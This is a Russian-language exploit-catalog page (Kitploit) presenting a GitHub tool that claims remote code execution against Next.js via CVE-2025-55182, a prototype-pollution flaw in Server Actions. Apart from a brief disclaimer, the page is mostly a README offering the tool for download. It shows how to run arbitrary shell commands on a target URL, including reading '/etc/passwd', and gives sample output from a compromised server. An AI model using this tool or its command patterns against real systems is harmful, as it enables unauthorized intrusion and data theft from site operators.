Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/racall/cve-2025-55182-node
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCE Exploit Tool

Репозиторий
18 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 Инструмент эксплуатации RCE в Next.js

Китайская документация | Анализ принципов уязвимости


[!CAUTION]

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ - ПРОЧТИТЕ ПЕРЕД ИСПОЛЬЗОВАНИЕМ

Этот инструмент предназначен ТОЛЬКО для:

  • Исследователей безопасности, проводящих проверку уязвимостей
  • Авторизованного тестирования на проникновение с явного разрешения
  • Образовательных и учебных целей

Несанкционированный доступ к компьютерным системам НЕЗАКОНЕН.

Используя этот инструмент, вы соглашаетесь с тем, что:

  1. Вы получили надлежащее разрешение перед тестированием любой системы
  2. Вы не будете использовать этот инструмент в злонамеренных целях
  3. Вы несете единоличную ответственность за свои действия и любые последствия

Автор не несет НИКАКОЙ ответственности за неправомерное использование этого инструмента.


Инструмент для эксплуатации удаленного выполнения кода (RCE) для уязвимости загрязнения прототипа на стороне сервера Next.js.

Обзор уязвимости

CVE-2025-55182 — это критическая уязвимость безопасности, затрагивающая Next.js, которая позволяет злоумышленникам добиться удаленного выполнения кода с помощью специально созданных запросов, использующих загрязнение прототипа.

📖 Подробный технический анализ см. в EXPLOIT.md

Затронутые версии

  • Конкретные версии Next.js (обратитесь к официальному бюллетеню безопасности)

Как это работает

Эта уязвимость использует механизм обработки запросов Server Actions в Next.js, достигая произвольного выполнения кода через загрязнение цепочки прототипов __proto__ в сочетании с конструктором Function.

Установка

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

Использование

Прямое выполнение

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

Использование скриптов yarn

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

Глобальная установка CLI

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

Параметры CLI

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Целевой URL (обязательно)
  command   Команда для выполнения (по умолчанию: whoami)

Options:
  -h, --help     Показать справку
  -v, --version  Показать номер версии

Формат вывода

Инструмент выводит результаты в формате JSON:

Успешное выполнение

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

Ошибка выполнения

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

Пример

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

Зависимости

  • axios — HTTP-клиент
  • form-data — построитель FormData

Ссылки

  • Обратитесь к Python-скриптам
Скачать инструмент